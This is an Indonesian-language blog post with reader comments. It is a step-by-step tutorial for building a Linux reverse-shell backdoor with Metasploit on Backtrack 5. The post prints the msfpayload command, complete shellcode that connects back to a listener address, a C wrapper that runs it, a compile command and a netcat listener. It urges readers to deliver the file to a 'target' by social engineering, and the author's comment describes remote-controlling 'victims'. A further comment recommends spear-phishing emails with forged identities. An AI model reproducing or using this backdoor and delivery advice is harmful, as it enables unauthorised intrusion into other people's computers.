Monday, November 14, 2011

Exploit Linux dengan Backtrack 5

Sebelumnya artikel saya banyak membahas exploitasi kepada windows, saat ini kita akan melakukan exploit terhadap sistem operasi linux, sahabat mungkin merasa bahwa linux sahabat adalah Sistem operasi paling aman sejagat, tapi saya bilang tidak, karena tidak ada sistem yang paling aman didunia ini, paling ngak kalau sistemnya ngak bisa ditembus gunakan saja social engginer, ato culik aja administratornya, trus tanyain deh,hehe.. berikut contoh exploitasinya.

1. Dapatkan kode exploit.

root@bt:~# cd /pentest/exploits/framework/
root@bt:/pentest/exploits/framework# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.43.66 LPORT=5050 C
/*
 * linux/x86/shell_reverse_tcp - 71 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.43.66, LPORT=5050, 
 * ReverseConnectRetries=5, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
root@bt:/pentest/exploits/framework# 


2. Buat file exploit.

buka gedit kemudian copy hasil dari kode exploit yang kita dapatkan.
edit menjadi seperti sibawah ini.

unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) buf;
(int)(*funct)();
}

simpan dengan nama exploitbacktrack.c


3. Compile file exploit.

root@bt:~# gcc -o exploitbacktrack exploitbacktrack.c
root@bt:~# 


4. Gunakan Social Engginer agar file exploit melayang kepada komputer target.

5. Buka terminal baru dan buat listener untuk menunggu file exploit kita dieksekusi.

root@bt:~# nc -lvp 5050

6. Dan Bang bang bang Pawned !!

kontraktor acp

Author & Editor

Has laoreet percipitur ad. Vide interesset in mei, no his legimus verterem. Et nostrum imperdiet appellantur usu, mnesarchum referrentur id vim.

7 comments:

  1. gan,,,ini untuk apa yak ? he
    maap ane newbie

    ReplyDelete
  2. @kianny

    Ini tehnik/cara exploitasi sistem operasi Linux, jadi caranya rada-rada aneh dari biasanya, tehnik diatas adalah kita membuat backdoor yang nantinya dikirimkan dan dijalankan pada komputer target sedangkan komputer kita membuat listener agar jika backdoor dijalankan, kita bisa meremote komputer korban,:)

    ReplyDelete
  3. mas minta operasi dasarnya boleh gak....
    mohon bantuannya yah mas ..

    ReplyDelete
  4. wah ribet juga ya. ikut donk mau app penunjangnya.
    saya mac user

    ReplyDelete
  5. kelamaan ....
    langsung aje ketik root@bt:~#msfconsole

    trus msf> search netapi <-- ini buat cari kelemahan pada windows ...

    semua yang dibahas kalian hanya bisa berjalan di jaringan LAN maupun WLAN...

    kalo mau buat jebakan pake spear phising ..kirim attachment lewat email dengan pemalsuan identitas

    ReplyDelete

Silahkan meninggalkan pesan jika artikel diatas membantu anda,:)

 
biz.